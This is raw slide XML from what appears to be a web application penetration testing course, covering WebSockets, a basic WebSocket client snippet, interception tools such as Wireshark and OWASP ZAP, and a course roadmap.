              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340087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WebSockets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750811" y="1614714"/>
            <a:ext cx="7610476" cy="4354286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>One of our favorite new technologies is WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://dev.w3.org/html5/websockets/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>WebSockets are designed to establish connections to a back end server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Allows for long term communication between the server and the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Support bi-directional communication over a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>TCP socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Designed to deal with blocked ports and network restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>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BA22FA10-B862-2647-AC71-60EC04B0EE4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7719937" y="5051425"/>
            <a:ext cx="1282699" cy="1282699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8567752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WebSockets Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>WebSockets depend on the server and the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>JavaScript/HTML5 and custom servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A handshake happens via HTTP(S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>101 Switching Protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> response instructs the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ws:// protocol handler initiates the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wss:// for secure websockets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4619625"/>
            <a:ext cx="8724900" cy="1984375"/>
          </a:xfrm>
          <a:prstGeom prst="round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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4698999"/>
            <a:ext cx="8334375" cy="15501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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>// Create connection with subprotocols specified</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>var connection = new WebSocket('ws://ws.PEWAPT101.org/echo', ['soap', 'xmpp']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>// Send  text message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>connection.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>("PEWAPT101 WS Client");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3104356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WebSocket Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many tools we use commonly can't handle WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To capture, intercept or fuzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WireShark can capture the raw network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sniffing the network communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP's Zed Attack Proxy (ZAP) can intercept and fuzz WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allowing us to test the functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67901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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12293" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="0"/>
            <a:ext cx="3276600" cy="68580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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" u="sng" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
